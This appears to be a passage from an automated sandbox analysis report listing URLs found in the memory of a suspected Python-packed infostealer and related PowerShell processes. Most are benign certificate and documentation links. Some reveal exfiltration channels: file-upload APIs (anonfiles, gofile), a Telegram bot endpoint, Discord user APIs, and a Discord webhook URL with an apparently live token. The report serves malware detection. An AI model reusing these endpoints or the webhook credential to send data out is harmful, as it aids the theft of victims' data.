              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: X9g8L63QGs.exe, 00000007.00000003.1288179226.000001E7C2913000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: X9g8L63QGs.exe, 00000007.00000003.1688465803.000001E7C28C2000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694008349.000001E7C29A2000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C28C6000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691953051.000001E7C29A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695698107.000001E7C2EAE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692076374.000001E7C2EBC000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692121496.000001E7C2EAD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695917994.000001E7C2EBD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691987395.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: powershell.exe, 00000014.00000002.1488439935.000002452B935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.0000017524565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1499829000.0000017515E59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://ocsp.digicert.com0
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000046.00000002.1499829000.0000017515DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000014.00000002.1444673168.000002451BAEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000014.00000002.1444673168.000002451B8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1499829000.00000175144F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000014.00000002.1444673168.000002451BAEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000046.00000002.1499829000.0000017515C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000046.00000002.1499829000.0000017515DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: X9g8L63QGs.exe, 00000007.00000003.1291153468.000001E7C2E93000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290762711.000001E7C2E8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290762711.000001E7C2DFE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 00000014.00000002.1444673168.000002451B8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1499829000.00000175144F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3884000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2C80000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1289606937.000001E7C2D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2C80000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1289606937.000001E7C2D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerrz
              Source: X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2C80000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1289606937.000001E7C2D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerrzr
              Source: X9g8L63QGs.exe, 00000007.00000003.1593207468.000001E7C2FDD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1689148113.000001E7C2FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3884000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: X9g8L63QGs.exe, 00000007.00000003.1594746457.000001E7C39F8000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: X9g8L63QGs.exe, 00000007.00000002.1694449403.000001E7C2A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: X9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1315377405426270278/HIGwvC-Zpfa8Zkb7aEYPMg-EuYuZPz1LJEfXefQjcA8JYgb
              Source: X9g8L63QGs.exe, 00000007.00000003.1593207468.000001E7C2FDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: X9g8L63QGs.exe, 00000007.00000002.1694449403.000001E7C2A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.4.drString found in binary or memory: https://docs.python.org/3/howto/mro.html.
              Source: X9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C2440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: X9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: X9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: X9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: X9g8L63QGs.exe, 00000007.00000003.1279203002.000001E7C2569000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C2440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: X9g8L63QGs.exe, 00000007.00000002.1693650050.000001E7C2780000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1279203002.000001E7C2569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
